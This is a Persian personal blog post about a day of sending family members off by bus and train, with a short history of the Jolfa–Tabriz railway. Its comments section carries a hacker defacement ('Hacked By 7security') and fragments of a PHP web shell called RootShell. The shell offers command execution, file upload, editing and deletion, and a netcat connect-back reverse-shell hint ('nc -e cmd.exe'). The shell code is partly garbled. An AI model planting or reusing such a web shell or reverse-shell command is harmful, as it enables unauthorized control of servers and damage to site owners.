سعي ميكنم آنچه را كه در طول روز در جامعه ام اتفاق مي افتد و تاثير گذار ميباشد بنويسم ..

يك روز پر كار

امروز بعلت مسافرت بجه زودتر از هميشه صبحانه خورديم و دو تا ار بجه هارا از ترمينال راهي تبريز كرديم  پرداخت قبض برق و حواله پول از باجه خود پرداز  و... با سهولت تمام انجام شد بعد از ظهر هم يكي از بچه هارا با قطار از ايستگاه هاديشهر ( گرگر ) راهي تهران كرديم . اين ايستگاه يكي ار قديمي ترين هاي راه آهن كشور ميباشد كه توسط روس ها ساخته شده است.

مختصري از خط آهن جلفا - تبريز

راه‌ آهن‌ جلفا

نخستين‌ بار راه‌آهن‌ آذربايجان‌ بدست‌ دولت‌ روس‌ تزاري‌ در سال‌ 1913 ميلادي‌ آغاز شد. و درتابستان‌ همان‌ سال‌ پيش‌ از آغاز جنگ‌ جهاني‌ اول‌ نقشه‌ برداري‌ راه‌آهن‌ جلفا آغاز شد. و در پايان‌ همان‌سال‌ به‌ پايان‌ رسيد. در زمستان‌ سال‌ 1913 طرح‌ آن‌ تهيه‌ و هزينه‌ پيش‌بيني‌ شده‌ تنظيم‌ گشت‌ و در سال‌1914 مجموعه‌ آنها براي‌ تصويب‌ به‌ وزارت‌ راه‌ روسيه‌ ارسال‌ شد. در اوايل‌ همين‌ سال‌ كارهاي‌ مقدماتي‌اين‌ راه‌ از قبيل‌ سفارش‌ دادن‌ وسايل‌ ساختماني‌ ماشين‌هاي‌ لازم‌ ولوازم‌ ارتباطي‌ و غيره‌ انجام‌ گرفت‌. درماه‌ مه‌ 1914 ميلادي‌ يعني‌ درست‌ دو ماه‌ پيش‌ از جنگ‌ جهاني‌ اول‌ كارهاي‌ ساختماني‌ راه‌آهن‌ آذربايجان‌آغاز شد. با شروع‌ جنگ‌ جهاني‌ اول‌ و ورود دولت‌ عثماني‌ به‌ جنگ‌ و اتحاد امپراتوري‌ آلمان‌ در ماه‌دسامبر 1914 قشون‌ تركهاي‌ عثماني‌ داخل‌ آذربايجان‌ شد و در ماه‌ ژانويه‌ 1915 وارد تبريز گرديده‌ وخط آهن‌ آذربايجان‌ را تا مرند اشتغال‌ كردند.

البنه كارهاي ريز و درشت ديگري هم بود  

 

 


نظرات:

Hacked By 7security
«NEO» می‌گوید:
« 0Wn3R NEO From 7security
 ____       _     ____ _     _ _
| _ \ ___  ___ | |_   / ___|| |__  ___| | |
| |_) / _ \ / _ \| __|   \___ \| '_ \ / _ \ | |
| _ < (_) | (_) | |_  _  ___) | | | | __/ | |
|_| \_\___/ \___/ \__| (_) |____/|_| |_|\___|_|_|

 .:: 0Wn3R By  NEO From 7security ::.

!
 

[ Server Info ]

Current Directory:
Shell:
Server Software:
Server Name:
Server Protocol:


[ Command Execute ]

[ File Upload ]


Insert your commands here:
 Info: For a connect back Shell, use: nc -e cmd.exe [SERVER] 3333
after local command: nc -v -l -p 3333 (Windows)

Here you can upload some files. 

 

File already exist

"; } else { copy($file,"$filename"); if( file_exists($filename)) { echo "

File uploaded successful

"; } elseif(! file_exists($filename)) { echo "

File not found

"; } } } ?>

[ Directories ]

[ File Viewer ]

".$file."
\n"; } else { echo "".$file."
\n"; } } closedir($dh); } } ?>

 

 

[ File Editor ]

[ Notices ]

Error or No contents in file"; } else $status = "File does not exist!"; } else if($_POST["submit"] == "Delete") { if(file_exists($filename)) { if(unlink($filename)) $status = "File successfully deleted!"; else $status = "Could not delete file!"; } else $status = "File does not exist!"; } else if($_POST["submit"] == "Save") { $filecontents = stripslashes(html_entity_decode($_POST["contents"])); if(file_exists($filename)) unlink($filename); $handle = fopen($filename, "w"); if(!$handle) $status = "Could not open file for write access! "; else { if(!fwrite($handle, $filecontents)) $status = $status."Could not write to file! (Maybe you didn't enter any text?)"; fclose($handle); } $filecontents = htmlentities($filecontents); } else { $status = "No file loaded!"; } ?>
 


[ Remove Shell ]

Type "remove" to remove the RootShellalert('Thank you for using the RootShell!');self.location.href='http://www.sr-crew.org';"; } ?>


Rootshell v © 

»گزارش تخلف
بعدی